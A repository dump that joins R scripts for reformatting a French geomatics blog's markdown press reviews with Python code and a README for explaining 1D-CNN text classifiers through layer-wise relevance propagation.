La toute nouvelle maison d'éditions [<NAME>](http://jean-boite.fr/) publie une monographie de l'artiste [<NAME>](http://jonrafman.com/) inspirée de son projet [9 eyes](http://9-eyes.com/). C'est un recueil bilingue de 160 pages en couleur de photos insolites trouvées en se baladant sur Google Street View
### Song Map
{: .img-rdp-news-thumb }
[Song Map](http://www.wearedorothy.com/art/song-map-signed-and-stamped-limited-edition/) est une carte urbaine réalisée par le collectif [Dorothy](http://www.wearedorothy.com/) où les noms de rues ont été remplacés par des titres de chansons. L'avenue la plus importante est bien entendu Highway to hell! Pour les amateurs de musique, la carte peut également s'accompagner d'une playlist concoctée par les auteurs
<file_sep># Suppression des espaces ----
# 04-06-2012
rdp <- "../../rdp//2012/rdp_2012-04-06.md"
con <- file(rdp, "r", encoding = "UTF-8")
lines <- readLines(con)
close(con)
grepl("\\s{1,2}[]*", lines[4])
myLine <- lines[121]
reformatLine(lines[1])
grepl("\\s+.*", myLine)
grepl("\\s+.*", "toto")
removeLeadingSpace(myLine)
grep("mapserver", lines)
myLine <- lines[42]
myLine
# Niveaux de titres ----
#### Sortie de la semaine
# https://github.com/geotribu/website/blob/fenfyx2/content/rdp/2011/rdp_2011-12-23.md?plain=1#L25
# #### Projets artistiques
#
# {: .img-rdp-news-thumb }
#
# ### The Nine Eyes of Google Street View
# {: .img-rdp-news-thumb <file_sep># Accessibility ----
isAccessible <- function(link) {
grepl("^\\!\\[(.*)\\]\\(.* \".*\"\\)$", link)
}
addAccessibility <- function(imgLink) {
# On récupère la fin de l'URL
# Par ex. pour ""
# On prend gdal.png
stem <- gsub("\\!\\[.*\\]\\(.*/(.*)\\).*", "\\1", imgLink)
# Le nom est gdal (on splitte par le point .)
imageName <- strsplit(stem, "\\.")[[1]][1]
# On remplace certains caractères par des espaces
imageName <- gsub("-", " ", imageName)
imageName <- gsub("_", " ", imageName)
# On extrait la description de l'image si elle existe
# A savoir le alt.
# imgLink <- ""
description <- gsub("\\!\\[(.*)\\].*", "\\1", imgLink)
# Si la description est vide, on y met le nom de l'image (sans l'extension)
description <- ifelse(description == "", imageName, description)
# On récupère le lien http://...
link <- gsub("^.*\\((.*)\\).*", "\\1", imgLink)
# La première partie est celle entre crochets : ![toto]
# Si la description est vide, on y met le nom de l'image (sans l'extension)
part1 <- sprintf("![%s]", description)
# La seconde partie est celle entre parenthèses.
# On y ajoute le nom de l'image
part2 <- sprintf("(%s \"%s\")", link, description)
# On colle les deux parties
newLink <- paste0(part1, part2)
return(newLink)
}
reformatLinks <- function(lines) {
newLines <- lines
for(i in 1:length(lines)) {
myLine <- lines[i]
httpLinks <- str_extract_all(myLine, "\\[\\S*\\s?\\S*\\]\\(\\S+\\)") %>% unlist
imageLinks <- str_extract_all(myLine, "\\!\\[\\S*\\s?\\S*\\]\\(\\S+\\)") %>% unlist
for(imgLink in imageLinks) {
if(!isAccessible(imgLink)) {
newImgLink <- addAccessibility(imgLink)
message(imgLink, "\ndevient\n", newImgLink)
newLines[i] <- str_replace(newLines[i], fixed(imgLink), newImgLink) # !! fixed
message("---")
}
}
}
return(newLines)
}
# Leading space ----
removeLeadingSpace <- function(myLine) {
trimws(myLine, which = "left")
}
reformatLine <- function(myLine) {
newLine <- NULL
# Avec hashtags ou pas
if(isNotWellFormatted1(myLine)) {
newLine <- reformatTitle1(myLine)
}
# Avec une image au début
if(isNotWellFormatted2(myLine)) {
newLine <- reformatTitle2(myLine)
}
return(newLine)
}
reformatLeadingSpace <- function(lines) {
newLines <- lines
for(i in 1:length(lines)) {
myLine <- lines[i]
# Suppression des espaces au début
if(isNotWellFormatted3(myLine)) {
newLines[i] <- removeLeadingSpace(myLine)
}
}
return(newLines)
}
readRdp <- function(rdp) {
con <- file(rdp, "r", encoding = "UTF-8")
lines <- readLines(con)
close(con)
return(lines)
}
writeRdp <- function(lines, repairedRdp) {
con <- file(repairedRdp, encoding = "UTF-8")
writeLines(lines, con)
close(con)
}
relevelTitles <- function(lines) {
for(j in 1:length(lines)) {
myLine <- lines[j]
if(grepl("\\#\\#\\#\\#.*", myLine)) {
print("NIVEAU")
w <- (j+1:(j+10))
myLines <- lines[w]
w <- which(myLines == "" | grepl("\\{\\: \\.img-rdp-news-thumb \\}", myLines))
myLines <- myLines[-w]
w <- grep("\\#+", myLines)
myLines <- myLines[w]
if(grepl("\\#\\#\\#\\s.*", myLines[1])) {
newLine <- str_replace(myLine,"^####\\s(.*)", "## \\1")
lines[j] <- newLine
message(paste0(myLine, "\n=>\n", newLine))
message("\n")
# writeLog(logFile, myLine, newLine)
}
}
}
return(lines)
}
reformatTitles <- function(lines) {
newLines <- vector(mode = "list")
for(i in 1:length(lines)) {
myLine <- lines[i]
newLine <- reformatLine(myLine)
# Réaffectation
if(is.null(newLine)) {
newLines[i] <- myLine
} else {
newLines[[i]] <- newLine
}
}
res <- unlist(newLines)
return(res)
}
reformatRdp <- function(rdp, outputFolder, inputEncoding = "UTF-8") {
# Variables
year <- gsub("^.*rdp_([0-9]*).*$", "\\1", rdp) %>% as.integer()
# Lecture de la RDP
lines <- readRdp(rdp)
# File name
fileName <- gsub("^.*/(.*\\.md)$", "\\1", rdp)
# Log file
logFile <- file.path(outputFolder, year, gsub(".md", "-log.md", fileName))
if(file.exists(logFile)) file.remove(logFile)
# CORRECTION DES TITRES EN GRAS -> H3
lines <- reformatTitles(lines)
# NIVEAUX DE TITRES H4 -> H3
lines <- relevelTitles(lines)
# CORRECTION DES ESPACES DEVANT
lines <- reformatLeadingSpace(lines)
# RELOCATE THUMBNAILS
lines <- relocateThumbs(lines)
# REFORMAT LINKS
lines <- reformatLinks(lines)
# Export de la nouvelle version
repairedRdp <- file.path(outputFolder, year, fileName)
writeRdp(lines, repairedRdp)
message("\n")
# Récupérer les images d'un article (expérimental)
# test <- lines[85]
# getImgs(test)
}
myLine <- "**Filtres temporels dans GvSIG"
# myLine <- "### L'Open Data en image** tototototo"
# myLine <- "## L'Open Data en image** tototototo"
# myLine <- "L'Open Data en image** tototototo"
# myLine <- " **OpenLayers Mobile**"
isNotWellFormatted1 <- function(myLine) {
grepl("^(###?\\s)?.*\\*\\*", myLine)
}
# Espaxces devant, à l'exception du YAML du début (4 espaces)
isNotWellFormatted3 <- function(myLine) {
grepl("^\\s{1,2}(\\#|\\!|\\[|[a-z]|[A-Z]|[0-9])", myLine, perl = TRUE)
}
# countHashtags("## L'Open Data en image** tototototo")
# countHashtags("### L'Open Data en image** tototototo")
# countHashtags("#### L'Open Data en image** tototototo")
countHashtags <- function(myLine) {
n <- 0
for(i in 1:4) {
hashtags <- paste(rep("#", i), collapse="")
if(grepl(sprintf("^%s\\s.*", hashtags), myLine)) n <- i
}
return(n)
}
writeLog <- function(logFile, myLine, newLine) {
write(myLine, file = logFile, append = TRUE)
write("\n\ndevient\n\n", file = logFile, append = TRUE)
write(newLine, file = logFile, append = TRUE)
write("\n----", file = logFile, append = TRUE)
}
# "**gvSIG** La 7ème édition des journées "
isNotWellFormatted2 <- function(myLine) {
regex <- "\\s?(\\!\\[.*\\]\\(.*\\))\\*\\*(.*)\\*?\\*?(.*)"
grepl(regex, myLine)
}
reformatTitle2 <- function(myLine) {
# **gvSIG**
regex1 <- "\\s?(\\!\\[.*\\]\\(.*\\))\\*\\*(.*)\\*\\*(.*)"
# **<NAME> en direct
regex2 <- "\\s?(\\!\\[.*\\]\\(.*\\))\\*\\*(.*)"
if(grepl(regex1, myLine)) {
title <- str_replace(myLine, regex1, "### \\2")
img <- str_replace(myLine, regex1, "\\1{: .img-rdp-news-thumb }")
body <- str_replace(myLine, regex1, "\\3")
return(list(title, img, body))
} else if (grepl(regex2, myLine)) {
title <- str_replace(myLine, regex2, "### \\2")
img <- str_replace(myLine, regex2, "\\1{: .img-rdp-news-thumb }")
return(list(title, img))
}
}
relocateThumbs <- function(lines) {
newLines <- lines
for(i in 1:length(lines)) {
myLine <- lines[i]
if(grepl("^\\!\\[.*\\]\\(.*\\)\\{\\: \\.img-rdp-news-thumb \\}$", myLine)) {
print(i)
# On extrait un échantillon des textes
# jusqu'à la 5e ligne
w <- c(i:(i+5))
myLines <- lines[w]
# on vérifie si l'élément qui vient juste après est un titre
w <- w[which(myLines != "")][2]
# Si c'est un titre...
if(grepl("^\\#+.*", lines[w])) {
title <- lines[w]
img <- lines[i]
#...on ajoute l'image dans le corps de l'article
newLines[w] <- paste0(title, "\n\n", img, "\n") # !! utiliser plutôt une liste
# On commente la ligne originelle qui comprend l'image
newLines[i] <- sprintf("<!--%s-->", img)
}
}
}
# Clean : on enlève les éléments qui sont NA
# w <- which(sapply(newLines, is.na))
# res <- unlist(newLines)
return(newLines)
}
getNotWellFormatted <- function(lines) {
w <- which(sapply(1:length(lines), function(x) isNotWellFormatted(lines[[x]])))
return(list(w = w, lines = lines[w]))
}
reformatTitle1 <- function(myLine) {
hashtags <- rep("#", countHashtags(myLine)) %>% paste(collapse="")
if(hashtags == "") {
regex <- "^\\s?(?:\\*\\*)?(.*)\\*\\*\\s?(.*)$"
title <- str_replace(myLine, regex, "### \\1")
body <- str_replace(myLine, regex, "\\2")
} else {
regex <- sprintf("^(?:%s?\\s)?(.*)\\*\\*\\s?(.*)$", hashtags)
title <- str_replace(myLine, regex, sprintf("%s \\1", hashtags))
body <- str_replace(myLine, regex, "\\2")
}
return(list(title, body))
}
# Liste les fichiers du dossier, pour l'année concernée
listRdpsForYear <- function(year) {
rdps <- list.files(sprintf("%s/%d", inputFolder, year), full.names = T)
rdps <- rdps[which(grepl("^(?!.*(new|old)).*$", rdps, perl = TRUE))]
rdps
}
imgPar <- function(img) {
regex <- "^.*!\\[(.*)\\]\\((.*)\\).*$"
imgLogo <- gsub(regex, "\\1", img)
s <- gsub("^.*!\\[(.*)\\]\\((.*)\\).*$", "\\2", img)
imgUrl <- gsub("^(.*)\\s?\\\"(.*)\\\"$", "\\1", s)
imgCat <- gsub("^(.*)\\s?\\\"(.*)\\\"$", "\\2", s)
img <- list(imgLogo = imgLogo, imgUrl = imgUrl, imgCat = imgCat)
return(img)
}
buildRegex <- function(i) {
sprintf(".*%s.*", paste(rep(regex, i), collapse=".*"))
}
countLinks <- function(test) {
r <- "(!\\[.*\\]\\(.*\\))"
n <- 0
for(i in 1:5) {
r2 <- buildRegex(i)
if(grepl(r2, test)) n <- i
}
return(n)
}
# myLine <- " {: .img-rdp-news-thumb }"
# getImgs(myLine)
getImgs <- function(test) {
n <- countLinks(test)
out <- vector(mode="list")
for(i in 1:n) {
imgLink <- gsub(buildRegex(n), sprintf("\\%d", i), test)
out[[i]] <- imgPar(imgLink)
}
return(out)
}
cleanYear <- function(year) {
l <- list.files(sprintf("%s/%d", inputFolder, year), "-new.md", full.names = T)
for(elt in l) {
file.rename(elt, gsub("-new.md", ".md", elt))
file.remove(elt)
}
}
|
7a527342459c26f8f0b08ee6ec941d920013de7e
|
[
"Markdown",
"R"
] | 8 |
Markdown
|
datagistips/geotribu
|
d42c7323d87669be0949278b614e28a1e6150dca
|
5dbc7239ebf167f157da20f13a00c596b74980c3
|
refs/heads/master
|
<file_sep>package com.noodles.lynn.xml_parse;
import com.noodles.lynn.xml_parse.model.Book;
import java.io.InputStream;
import java.util.List;
/**
* Created by Lynn on 2016/4/19.
*/
public interface BookParser {
/**
* 解析输入流,得到book对象集合
* */
public List<Book> bookParse(InputStream is) throws Exception;
/**
* 序列化对象集合,得到xml形式字符串
* */
public String serialize(List<Book> books) throws Exception;
}
<file_sep>package com.noodles.lynn.xml_parse;
import android.util.Xml;
import com.noodles.lynn.xml_parse.model.Book;
import org.xml.sax.Parser;
import org.xmlpull.v1.XmlPullParser;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.List;
/**
* Created by Lynn on 2016/4/19.
*/
public class Pull_BookParser implements BookParser {
@Override
public List<Book> bookParse(InputStream is) throws Exception {
List<Book> books = null;
Book book = null;
// XmlPullParserFactory factory = XmlPullParserFactory.newInstance();
// XmlPullParser parser = factory.newPullParser();
XmlPullParser pullParser = Xml.newPullParser();//android.util.Xml 创建解析器实例
pullParser.setInput(is,"UTF-8");//设置输入流,编码格式。
int eventType = pullParser.getEventType(); //返回int 事件类型
while(eventType != XmlPullParser.END_DOCUMENT){
switch(eventType){
case XmlPullParser.START_DOCUMENT:
books = new ArrayList<Book>();
break;
case XmlPullParser.START_TAG:
if(pullParser.getName().equals("book")){
book = new Book();
}else if (pullParser.getName().equals("id")){
eventType = pullParser.next();
book.setId(Integer.parseInt(pullParser.getText()));
}else if (pullParser.getName().equals("name")){
eventType = pullParser.next();
book.setName(pullParser.getText());
}else if (pullParser.getName().equals("price")){
eventType = pullParser.next();
book.setPrice(Float.parseFloat(pullParser.getText()));
}
break;
case XmlPullParser.END_TAG:
if (pullParser.getName().equals("book")){
books.add(book);
book = null;
}
break;
}
eventType = pullParser.next();
}
return books;
}
@Override
public String serialize(List<Book> books) throws Exception {
return null;
}
}
|
a5923cbdf5e465ac78b5d0202b2e5e23908cda1d
|
[
"Java"
] | 2 |
Java
|
noodlespub/XML_Parse
|
9edeb0dced3e88f0d11425005056dce34651f9c1
|
bb0609829eeeae4127e30a0ce2cad3a3ac8b89dd
|
refs/heads/main
|
<repo_name>Wednesque/xai-cnn-lrp<file_sep>/preprocessor.py
import numpy as np
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
from keras.preprocessing.sequence import pad_sequences
from keras.preprocessing.text import Tokenizer
from keras_preprocessing.text import tokenizer_from_json
filepath_dict = {'yelp': 'data/sentiment_analysis/yelp_labelled.txt',
'amazon': 'data/sentiment_analysis/amazon_cells_labelled.txt',
'imdb': 'data/sentiment_analysis/imdb_labelled.txt',
'merged' : 'data/sentiment_analysis/merged_sent.txt',
'qa_1000': 'data/sentiment_analysis/qa_1000.txt',
'TREC_10': 'data/sentiment_analysis/TREC_10.txt',
'qa_5500': 'data/sentiment_analysis/qa_5500.txt',
}
# This class transforms sentences into embedding matrices for text classification
# The input file consists of a list of sentences follow by the class of the sentences
# set gen to True to force the generation of the embedding model
tokenizer_path = "./tokenizers/"
class Preprocessor :
def __init__(self,source='yelp', embedding_dim=50, max_words = 100, gen = True, n_classes=2, embedding_dir = 'data/glove_word_embeddings', tokenizer_file=None) :
print("Initializing the preprocessor....")
self.embedding_dim = embedding_dim # number of column of the embedding matrix
self.max_words = max_words # number of lines of the embedding matrix
self.embedding_model_file = embedding_dir+'/glove.6B.'+str(self.embedding_dim)+'d.txt'
self.n_classes = n_classes
self.gen = gen
self.source = source
self.df = self.load_data_sources(source)
#self.load_models()
self.tokenizer = self.load_tokenizer(tokenizer_file)
self.datasets_path = './datasets/'+self.source
print("Preprocessor initialized")
def load_tokenizer(self, file_name = None):
if file_name is None :
file_name = tokenizer_path + "/" + self.source + '_tokenizer.json'
if os.path.isfile(file_name) :
with open(file_name) as f:
data = json.load(f)
tokenizer = tokenizer_from_json(data)
return tokenizer
else :
return Tokenizer(num_words=10000)
def save_tokenizer(self,file_name=''):
tokenizer_json = self.tokenizer.to_json()
with open(tokenizer_path + "/" + self.source + '_tokenizer.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(tokenizer_json, ensure_ascii=False))
# this method load the basic utils models from files if exists otherwise they are generated.
# set the property gen to True to force the generation of those models
def load_models(self,source = None):
if self.gen or os.path.isfile('./embedding_dic.json'):
# update the embedding dic
self.embedding_dic = self.create_filtered_embedding_dic()
else :
self.embedding_dic = self.loadDicModel('./embedding_dic.json')
def load_all_data_sources(self):
df_list = []
for source, filepath in filepath_dict.items():
df = pd.read_csv(filepath, names=['sentence', 'label'], sep='\t', encoding="utf8")
df['source'] = source # Add another column filled with the source name
df_list.append(df)
self.df = pd.concat(df_list)
return self.df
def load_data_sources(self,source) :
self.df = self.load_all_data_sources()
self.df = self.df[self.df['source'] == source]
return self.df
def loadDicModel(self, file):
with open(file) as json_file:
return json.load(json_file)
def sentence_to_matrix(self, sentence):
embedding_matrix = np.zeros((self.max_words,self.embedding_dim))
i = 0
for word in sentence :
if word in self.embedding_dic :
embedding_matrix[i] = np.array(self.embedding_dic[word])
i+=1
if i == self.max_words :
break
return embedding_matrix
def generate_embedding_dataset(self):
print("Start dataset generation...")
sentences = self.df['sentence'].values
y = dy = self.df['label'].values
sentences_train, sentences_test, y_train, y_test = train_test_split(sentences, y, test_size=0.25,
random_state=1000)
# generate the embedding dataset for train sentences
print("Generating train set...")
self.generate_dataset_matrix(sentences_train,y_train,self.datasets_path+"/train.csv",self.datasets_path+"/train_sents_ref.json")
#generate embedding dataset for test sentences
print("Generating test set...")
self.generate_dataset_matrix(sentences_test, y_test ,self.datasets_path+"/test.csv",self.datasets_path+"/test_sents_ref.json", test=True)
print("Datasets generated")
print("Train set : "+self.datasets_path+"/train.csv")
print("Test set : "+self.datasets_path+"/test.csv")
def generate_dataset_matrix(self, sentences, y_vect, output_file, sent_ref_file, test=False):
writer = csv.writer(open(output_file, 'w', newline=''), delimiter=',')
matrix = np.empty((0, self.embedding_dim * self.max_words + self.n_classes + 1), dtype=np.float16)
i = 0 # index of the sentence.
sentences_ref = dict()
hope = len(sentences)/100
for sent,y in zip(sentences,y_vect) :
matrix = self.sentence_to_matrix(sent)
out = [0]*self.n_classes
#print(y, sent)
out[y] = 1
sentences_ref.update({i:{'sentence':sent,'class':int(y)}})
matrix = np.insert(np.append(matrix.reshape((1, self.embedding_dim * self.max_words)), out), 0, i)
matrix = matrix.reshape(1, 1 + self.n_classes + self.embedding_dim * self.max_words)
writer.writerow(['{:.3f}'.format(x) for x in matrix.flatten()])
#compute the progession
i+=1
percentage = i/hope
if i%hope == 0 :
print(i,out,sent)
print(str(percentage)+"% completed")
if (not test and i==200000) or (test and i==50000) :
break;
refs = json.dumps(sentences_ref, indent=4)
f = open(sent_ref_file, "w")
f.write(refs)
f.close()
def create_embedding_dic(self):
embed_dic = dict()
with open(self.embedding_model_file, encoding="utf8") as f:
for line in f :
word, *vector = line.split()
wv = np.array(vector, dtype=np.float16)[:self.embedding_dim]
embed_dic.update({word: wv.tolist()})
refs = json.dumps(embed_dic, indent=4)
f = open("embedding_dic.json", "w")
f.write(refs)
f.close()
def get_sequences(self, create_tokenizer=False) :
sentences = self.df.sentence.astype(str).values
y = dy = self.df['label'].values
out = np.zeros((len(y), self.n_classes))
for i in range(len(y)) :
out[i,y[i]] = 1
sentences_train, sentences_test, y_train, y_test = train_test_split(sentences, out, test_size=0.25,random_state=1000)
if create_tokenizer :
self.tokenizer = Tokenizer()
self.tokenizer.fit_on_texts(sentences)
self.save_tokenizer()
X_train = self.tokenizer.texts_to_sequences(sentences_train)
X_test = self.tokenizer.texts_to_sequences(sentences_test)
self.vocab_size = len( self.tokenizer.word_index) + 1 # Adding 1 because of reserved 0 index
maxlen = self.max_words
X_train = pad_sequences(X_train, padding='post', maxlen=maxlen)
X_test = pad_sequences(X_test, padding='post', maxlen=maxlen)
return(X_train, y_train, X_test, y_test)
def texts_to_sequences(self,file_path) :
df = pd.read_csv(file_path, names=['sentence', 'label'], sep='\t', encoding="utf8")
sentences = df.sentence.astype(str).values
y = dy = df['label'].values
out = np.zeros((len(y), self.n_classes))
for i in range(len(y)) :
out[i,y[i]] = 1
X_test = self.tokenizer.texts_to_sequences(sentences)
X_test = pad_sequences(X_test, padding='post', maxlen=self.max_words)
return(X_test, out)
def get_pad_sequence(self,text):
seq = self.tokenizer.texts_to_sequences(text)
pad_seq = pad_sequences(seq, padding='post', maxlen=self.max_words)
return pad_seq
def get_sentences(self, create_tokenizer=False) :
sentences = self.df.sentence.astype(str).values
y = dy = self.df['label'].values
out = np.zeros((len(y), self.n_classes))
for i in range(len(y)) :
out[i,y[i]] = 1
sentences_train, sentences_test, y_train, y_test = train_test_split(sentences, out, test_size=0.25,random_state=1000)
return(sentences_train, y_train, sentences_test, y_test)
def create_filtered_embedding_dic(self):
embed_dic = dict()
vocab = self.vocabulary()
with open(self.embedding_model_file, encoding="utf8") as f:
for line in f :
word, *vector = line.split()
if word in vocab :
wv = np.array(vector, dtype=np.float16)[:self.embedding_dim]
embed_dic.update({word:wv.tolist()})
refs = json.dumps(embed_dic, indent=4)
f = open("embedding_dic.json", "w")
f.write(refs)
f.close()
return embed_dic
def create_embedding_matrix(self):
vocab_size = len(self.tokenizer.word_index) + 1 # Adding again 1 because of reserved 0 index
embedding_matrix = np.zeros((vocab_size, self.embedding_dim))
with open(self.embedding_model_file, encoding="utf8") as f:
for line in f:
word, *vector = line.split()
if word in self.tokenizer.word_index:
idx = self.tokenizer.word_index[word]
embedding_matrix[idx] = np.array(
vector, dtype=np.float32)[:self.embedding_dim]
return embedding_matrix
def vocabulary(self):
tokenizer = Tokenizer()
sentences = self.df['sentence'].values
tokenizer.fit_on_texts(sentences)
return tokenizer.word_index
def filter_embedding_dic(self) :
pass
<file_sep>/README.md
# xai-cnn-lrp
This repository contains codes to explain One-Dimensional Convolutional Neural Networks (1D-CNN) using Layer-wise Relevance Propagation. The explanation technique consists in computing the relevance of the various n-gram features and determining sufficient and necessary n-grams. Codes developed in this project were designed for experimental purposes and cannot be used in the state to handle all the types of 1D-CNN architecture without any adaptation. The project comes with a multi-channel 1D-CNN model generator which can be used to generate testing models.
# Dependencies :
- python 3.6+
- keras (tested on 2.2+)
- numpy (1.16+)
- pandas (0.24+)
The project contains 4 main directories :
- data/sentiment_analysis
This directory contains training and test data to build 1D-CNN models and to test the explanation method
- models :
This directory contains pretrained 1D-CNN models for sentiment analysis and for question answering tasks.
- tokenizers :
This directory contains saved keras tokenizers for various datasets. A tokenizer contains the vocabulary that was used
to build the pretrained model.
- explanations :
This directory contains the results of explanations when executing the file explain_cnn.py. The explanations provided are contained in a json
file which name is related to the name of the model to explain.
# Explaining a model
## Quick start :
The file explain_cnn.py already has default values. To execute the explainer with the default configurations. simply run the following command :
python explain_cnn.py
By default, this command will compute the explanation of the first 10 sentences of the "merged" dataset (yelp+amazon+imdb). The result will be in the file
./explanations/merged_all_features_ngrams.json
## Custom configurations :
For custom configurations, execute the following actions :
1. open the file explain_cnn.py an edit the model parameters :
- set the variable model_name to the model you want to explain. Pretrained model_names are : merged (sentiment analysis), qa_1000 and qa_5500 (Question answering)
- Set the variable n_classes to the number of classes.
- Set the embedding dimension (embedding_dim) and the maximum number of words per sentence.
By default, the pretrained models was built with a word embedding dimension of 50 and a maximum number of words per sentence of 50
- Set the variable class_names to the name of classes :
class_names = ['NEGATIVE','POSITIVE'] for Sentiment analysis
or class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC'] for Question Answering
- Set the variable embedding_dim to the dimension of the embedding vectors.
- The variable kernel_sizes is a list of integers representing the kernel_size per channel. Example : kernel_sizes = [1,2,3]
N.B : If you are not sure of which parameters to use for a particular model, then you should consider building a new model with your
own parameter (see the section : Training a 1D-CNN model below)
2. run the command python explain_cnn.py
3. The result of the explanation is contained in the directory explanations under the name : <model_name>_all_feature_ngrams.json
## To explain the model on a single sentence :
Edit the file explain_sentence.py and set the appropriate parameters or leave the default ones. Modify the variable <sent> with the sentence to explain
Then run the command :
python explain_sentence.py
N.B : - The code implemented to explain 1D-CNN assumes that the CNN architecture taken as input has exactly 2 dense layers,
a variable number of channels (from 1 to n), a single global max-pooling layer, one convolution layer per channel
and a variable number of filters and kernel_sizes per channel.
- Further versions will take into account models with a variable number of dense layers.
# Model explanation results
The complete json file representing the explanation for a set of predictions is structured as follows :
[
{
"sentence": [
"it was either too cold not enough flavor or just bad"
],
"target_class": "NEGATIVE",
"predicted_class": "NEGATIVE",
"features": {
"all": {
"1-ngrams": [
{
"was": {
"NEGATIVE": 0.07160788029432297,
"POSITIVE": -0.06556335836648941,
"Overall": 0.13717123866081238
}
},
{
"not": {
"NEGATIVE": 0.1827062964439392,
"POSITIVE": -0.19882133603096008,
"Overall": 0.38679349422454834
}
},
...
],
"0-ngrams": [
{
"": {
"NEGATIVE": 0.1498018503189087,
"POSITIVE": -0.11607369035482407,
"Overall": 0.26587554812431335
}
}
]
},
"sufficient": {
"1-ngrams": [
{
"not": 0.38679349422454834
}
]
},
"necessary": {}
}
},
...
]
The json file is in the form of a list of elements where each element represents the explanation for a particular input sentence
which has been designed to be self-explanatory. Contributions are in the form
- ngram_feature :
- CLASS_NAME : value
- The value of the key "Overall" represents the relevance of the feature to the class predicted as the difference between its contribution to this class
and the mean of its contribution to other classes except the predicted class.
"0-ngram" represents ngram features which are not in the vocabulary or the translation of 0-padding sequences.
# Training a 1D-CNN model
The project comes with codes to train your own 1D-CNN.
To build your own CNN model for text classification do the followings :
1. Defines the model parameters.
- model_name : models names are defined in the variable file_path_dic defined in the file preprocessor/Preprocessor.py. If you want to build a model from your
own dataset, make sure the data file is saved inside the directory data/sentiment analysis and that its format is as described in data/readme.txt
Also make sure to add an entry corresponding to the data file in the dictionary file_path_dic
- embedding_dim : the dimension of word embeddings
- n_classes : The number of classes in the dataset
- max_words : The maximum number of words per sentence. Sentences with less word will be padded and sentences with higher number of words will
be pruned to reach the max_words
- kernel_sizes : a list of integers indicating the kernel_size per channel. Example : kernel_sizes = [1,2,3] means that they are 3 channels
and the first channel has filters of kernel_size 1, the second channel has filters of kernel_sizes 2 and the third channel has filters of kernel sizes 3
- n_filters : a list representing the number of filters per channel. Example : n_filters = [40,40,40]. It means that every channel has 40 filters
which makes a total of 120 filters.
NB : len(kernel_sizes) == len (n_filters)
2. After execute the command :
python train_1d_cnn.py
The model will be saved in the directory models under a name related to the name defined in the variable model_name
<file_sep>/process_imdb.py
import numpy as np
from keras.preprocessing.text import Tokenizer
from sklearn.model_selection import train_test_split
import pandas as pd
import json
import os
import csv
filepath = 'data/sentiment_analysis/IMDB_Dataset.csv'
df = pd.read_csv(filepath, names=['sentence', 'label'], sep=',', encoding="utf8")
sentences = df['sentence'].values
labels = df['label'].values
writer = csv.writer(open("imdb_labelled_50000.csv", 'w', newline='',encoding="utf8"), delimiter='\t')
for sent,y in zip(sentences,labels) :
label = 0
sent = sent.replace('"',"")
sent = sent.replace("\t"," ")
sent = sent.replace("<br />"," ")
if y == "positive" :
label = 1
writer.writerow([sent,label])
<file_sep>/explain_sentence.py
from preprocessor import Preprocessor, filepath_dict
from keras.preprocessing.sequence import pad_sequences
from keras.models import model_from_json
from explainer import TextCNNExplainer
def load_model(file_name) :
json_file = open(file_name, 'r')
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
return model
models_dir = './models/'
embedding_dim = 50
n_classes=6
max_words = 50
kernel_sizes=[1]
model_name = 'qa_5500'
#test_file_path = filepath_dict['qa_5500']
class_names = ['DESC','ENTY','ABBR','HUM','NUM','LOC']
#class_names = ['NEGATIVE','POSITIVE']
file_name = model_name+'_d'+str(embedding_dim)+'_l'+str(max_words)
model = load_model(models_dir+file_name+".json")
#sgd = optimizers.SGD(lr=0.01, decay=1e-6, momentum=0.1, nesterov=True)
model.compile(loss='binary_crossentropy',optimizer='adam',metrics=['accuracy'])
# load weights into new model
model_file_path = models_dir+file_name
model.load_weights(models_dir+file_name+'.h5')
print("Loaded model from disk")
model.summary()
pre = Preprocessor(source=model_name, max_words = max_words, embedding_dim=embedding_dim, n_classes=n_classes)
#sentence to explain
sent = "what is your name ?"
seq = pre.tokenizer.texts_to_sequences([sent])
seq = pad_sequences(seq, padding='post', maxlen=50)
explainer = TextCNNExplainer(pre.tokenizer, model_file_path, class_names, kernel_sizes=kernel_sizes)
#explanations = explainer.compute_ngrams_contributions(model, X_test[0:10,:], y_test[0:10,:])
explanations = explainer.compute_ngrams_contributions(model, seq)
print(explanations)<file_sep>/sequential_cnn.py
from keras.models import Sequential
from keras import layers
from sklearn.model_selection import train_test_split
from keras import optimizers
from sklearn.metrics import confusion_matrix
from sklearn.linear_model import LogisticRegression
from keras.layers.merge import concatenate
import numpy
from keras.models import Model
import tensorflow as tf
from keras.layers import Input
numpy.set_printoptions(precision=2)
import pandas as pd
from numpy.linalg import norm
model_name='yelp'
model_dir='models'
train_dataset = 'datasets/'+model_name+'/train.csv'
test_dataset = 'datasets/'+model_name+'/test.csv'
embedding_dim = 50
text_length = 50
n_class = 2
train_data = pd.read_csv(train_dataset, delimiter=",").values
test_data = pd.read_csv(test_dataset, delimiter=",").values
#train_data = numpy.loadtxt(train_dataset, delimiter=",", dtype=numpy.float32)
#test_data = numpy.loadtxt(test_dataset, delimiter=",", dtype=numpy.float32)
numpy.random.shuffle(train_data)
numpy.random.shuffle(test_data)
X_train = train_data[:,1:-n_class]
y_train = train_data[:,-n_class]
X_test = test_data[:,1:-n_class]
y_test = test_data[:,-n_class]
train_norms = norm(X_train, axis=1, ord=2)
test_norms = norm(X_test, axis=1, ord=2)
train_norms[train_norms == 0] = 1
test_norms[test_norms == 0] = 1
print(train_norms)
X_train = X_train / train_norms.reshape(X_train.shape[0],1)
X_test = X_test / test_norms.reshape(X_test.shape[0],1)
print(train_data[0,0],train_data[0,-2],train_data[0,-1])
print(train_data[10,0],train_data[10,-2],train_data[10,-1])
print(train_data[50,0],train_data[50,-2],train_data[50,-1])
print(train_data[80,0],train_data[80,-2],train_data[80,-1])
X_train = X_train.reshape((X_train.shape[0], text_length, embedding_dim))
X_test = X_test.reshape((X_test.shape[0], text_length, embedding_dim))
model = Sequential()
model.add(layers.Conv1D(100, 3, activation='relu'))
model.add(layers.GlobalMaxPool1D())
model.add(layers.Dense(10, activation='relu'))
model.add(layers.Dense(3, activation='relu'))
model.add(layers.Dense(1, activation='sigmoid'))
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'])
history = model.fit(X_train, y_train, epochs=200, verbose=True,
validation_data=(X_test, y_test), batch_size=32)
model.summary()
loss, accuracy = model.evaluate(X_train, y_train, verbose=False)
print("Training Accuracy: {:.4f}".format(accuracy))
